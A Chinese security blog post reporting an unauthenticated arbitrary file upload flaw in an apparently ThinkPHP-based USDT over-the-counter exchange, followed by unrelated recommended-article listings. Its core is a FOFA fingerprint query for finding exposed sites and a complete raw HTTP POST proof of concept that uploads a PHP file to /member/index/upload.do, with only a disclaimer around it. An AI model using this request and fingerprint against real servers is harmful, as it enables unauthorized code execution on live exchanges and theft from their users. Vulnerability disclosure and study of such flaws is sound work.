虚拟bi买卖USDT场外交易所upload.do存在任意文件上传

原创 已于 2025-05-23 13:04:35 修改 · 337 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #漏洞复现 #漏洞利用 #网络安全 #渗透测试 #漏洞库

于 2025-05-23 13:01:27 首次发布

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

问题描述

虚拟bi买卖USDT场外交易所由于在鉴权方面存在疏漏,导致了可未授权访问,从而通过upload.do接口进行任意文件上传。

fofa

body="/static/weui/css/wkb.css"

poc

POST /member/index/upload.do HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZcxuMaQ4IflRnJgy
Cookie: Hm_lvt_f4b3788b2247dd149fb7fdffe8aece79=1717334200; _ga=GA1.1.64233863.1717334200; PHPSESSID=8t16e4ahe761qikg272s6jhsi0
Host: 127.0.0.1:81
Origin: http://127.0.0.1:81
Referer: http://127.0.0.1:81/member/index/upload.do
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"

------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--

路径返回包中

爬取虚拟货币交易所行情:利用Python爬虫抓取和分析实时数据
2201_76125261的博客
05-03 1310
虚拟货币交易所是一个在线平台,允许用户交易虚拟货币和法定货币之间的兑换。交易所通过提供市场数据、交易工具以及买卖订单来帮助用户实现虚拟货币交易。价格:包括当前价格、24小时内最高最低价格、涨跌幅等。交易量:24小时内的成交量、买单卖单的订单量等。市场深度:买卖盘的价格和数量。交易对:不同虚拟货币间的交易对,如BTC/USD、ETH/BTC等。
实训商业源码-ThinkPHP框架USDT买卖交易网站源码-毕业设计.zip
05-09
本文介绍了一个以ThinkPHP框架为基础的USDT买卖交易网站源码,适合用作商业实训和毕业设计项目。ThinkPHP框架是PHP语言中一个广泛应用的开源框架,以其简洁、高效、易于学习而著称。在开发过程中,ThinkPHP提供了...
ThinkPHP框架USDT买卖交易网站源码修复版
破损的天堂鸟博客
08-19 1540
本程序为Thinkphp5开发,主要解决USDT的供求买卖关系,会员可以在平台挂卖或者购买USDT(通过发布订单的方式),就是一个纯场外虚_拟币的交易平台,只是一个买卖双方的售卖平台。导入数据库sjk.sql修改数据库链接application/database.php网站运行目录为:wkb伪静态规则:thinkphp后台:/admin.php/login/index?type=admin。
XEX智能交易所USDT交易XEX是什么交易所
ddsd7的博客
02-02 2289
XEX交易所是数字货币交易平台,致力于为数字货币的爱好者提供一个安全、公平、开放、高效的区块链数字资产交易平台,数字货币指基于区块链技术和加密技术产生的,以去中心化形式发行、管理的,有一定价值的加密令牌、数字令牌或加密货币。数字货币是电子货币形式的替代货币,常见的有比特币。比特币不依靠特定货币机构发行,它依据特定算法,通过大量的计算产生。比特币总数量只有2100万个,具有的特点包括去中心化、低交易费用、全世界流通、无隐藏成本、专属所有权、跨平台挖掘等。用户可以在全球任何地方进行挖掘、购买、出售或收取。
OTC场外交易平台源码/虚拟场外交易源码
网站开发专家
09-29 1937
最新场外交易平台源码|虚拟场外交易源码开发下载是一款基于thinkphp开发制作的最新场外交易系统! 源码无加密,无限制,可自行二开! 环境说明:php5.5+mysql+伪静态+apache 希望大家喜欢,有什么问题可以咨询我就行! ...
OTC冻卡袭来,远离USDT场外交易
weixin_44383880的博客
09-28 3938
自6月的冻卡潮之后,近期各个社群又频频爆出被冻,就我社群还有几个人冻了快半年,还没解封。这对于所有玩家来说非常头痛,自己又没干坏事,赚钱了还不能痛痛快快的套现。根据新京报消息,每年流到境...
多语言USDT交易市场源码/USDT理财系统源码/排单系统源码
软希网分享源码的博客
02-28 1627
多语言USDT交易市场源码/USDT理财系统源码/排单系统源码
USDT离线签名交易
小坚的技术博客
11-12 1658
本文作者:陈进坚 个人博客:https://jian1098.github.io 优快云博客:https://blog.csdn.net/c_jian 简书:https://www.jianshu.com/u/8ba9ac5706b6 联系方式:jian1098@qq.com USDT的离线交易需要进行下面这8个步骤 1.查询未花费交易 参数:最小确认区块数、最大确认区块数、钱包地址数组(逗...
精选资源
USDT空投USDT空投授权USDT自动空投代理管理.zip
11-28
USDT空投USDT空投授权USDT自动空投代理管理.zip
okex_swap_orderbook.BTCUSDT.20200415.csv.tar.gz
02-27
例如 "binance_orderbook.BTCUSDT.20190917.csv.tar.gz" 代表 Binance(币安) 交易所中 BTCUSDT 这个交易对品种在20190917日的盘口订单薄数据; 使用之前先解压,解压之后的文件为 "binance_orderbook.BTCUSDT....
精选资源
全套uni-app全智能量化USDT钱包APP静态模板.rar
01-20
八叔引擎之家原创全套uni-app全智能量化USDT钱包APP模板,使用uni-app开发,该模板为发布APP、H5手机网站开发模板,页面包含登录注册、找回密码、会员中习、管理中心、明细列表等多个页面。
加热激光雪深监测站守护冬季道路安全
pingao141378的博客
12-17 344
设备采用相位式激光测距技术,通过无线电波段频率调制激光束,精准捕捉往返雪面的相位延迟,测量误差仅 ±2%,分辨率达 1mm,能清晰捕捉从 0.05 米薄雪到 5 米厚雪的动态变化。而加热激光雪深监测站搭载 “主动加热 + 被动防霜” 双重防护体系,内置自动温控加热模块,当探头温度接近冰点时自动启动 15W 功耗加热,快速融化薄霜并预防结冰,配合 IP65 高防护等级外壳与纳米防霜涂层,即便在 100 高湿度环境中也能隔绝雨雪沙尘,实现 7×24 小时不间断监测,解决了低温停机的行业痛点。
绿电直连系统安全防护技术:网络安全、运行安全与数据安全的全维度保障
最新发布
xigedianli的博客
12-18 580
绿电直连系统面临网络安全、运行安全和数据安全三重风险,需构建全维度保障体系。网络安全需通过边界隔离、接入认证和威胁监测技术抵御攻击;运行安全依靠状态预警、协同控制和应急处置技术确保稳定供电;数据安全采用加密、脱敏和合规审计技术保护敏感信息。需结合技术防护与管理体系,实现风险联防联控,为绿电直连系统提供可靠安全保障,支撑低碳转型发展。
网络安全中级阶段学习笔记(七):Web 安全之文件上传漏洞笔记1(包含upload-labs-master靶场前三关实战)
2501_91976946的博客
12-15 855
摘要:本文系统梳理文件上传漏洞攻防要点,包含漏洞定义、危害(如Webshell控制服务器)、检测流程及多种绕过技巧(JS验证、MIME-Type、黑名单等)。重点提出"白名单+多环节验证"防御方案,包括严格后缀验证、文件类型检测、权限控制等。补充靶场实践案例,演示通过修改后缀、利用解析特性实现漏洞利用。强调防御需结合前端限制、服务端校验与安全监控,构建纵深防护体系。
自动化安全监测新突破:新一代测斜仪技术升级与行业应用
weixin_43963569的博客
12-17 514
摘要: 测斜仪技术正经历从传统人工操作向自动化、高效化的升级转型。传统测斜仪存在数据不连续、维护繁琐等问题,而基于MEMS和物联网技术的新一代阵列式、节段式位移计解决了这些痛点。节段式位移计通过模块化拼接、实时监测和可重复使用等优势,适应煤矿、基坑、坝体等场景需求;阵列式位移计则提供高精度三维监测能力。两者共同推动安全监测行业向精准化、低成本化发展,满足现代工程对实时预警和长期稳定监测的核心需求,为地质灾害防治和工程安全提供技术支撑。未来,智能化与灵活化将是测斜仪发展的主要方向。
蛋白质AI设计时代的生物安全:筑牢核酸合成的“安检门”
haisendashuju的博客
12-16 277
研究团队进行了一次系统的“AI红队”测试:他们利用ProteinMPNN等公开可用的AI蛋白设计工具,对72种已知的危险野生型蛋白进行了大规模“改头换面”,生成了超过7.6万个合成同源序列。其中,AI辅助的蛋白质设计尤为引人瞩目,它让科学家得以在浩瀚的“蛋白宇宙”中高效探索,定制具有特定功能的全新蛋白质,为攻克疾病、开发新材料带来革命性希望。然而,这项强大技术的普及也如同打开了“潘多拉魔盒”,引发了深刻的生物安全隐忧:倘若有人意图合成有害的蛋白质,日益“聪明”的AI设计工具是否会成为其帮凶?
web3.php 监听bnb usdt交易事件
05-28
在使用 `web3.php` 监听 BNB 链上的 USDT 交易事件时,我们需要以下几个步骤: 1. **安装 Web3.php**:确保你已经安装了 `web3.php` 库。 2. **连接到 BSC(BNB Chain)节点**:通过 HTTP 或 WebSocket 连接到 BSC ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值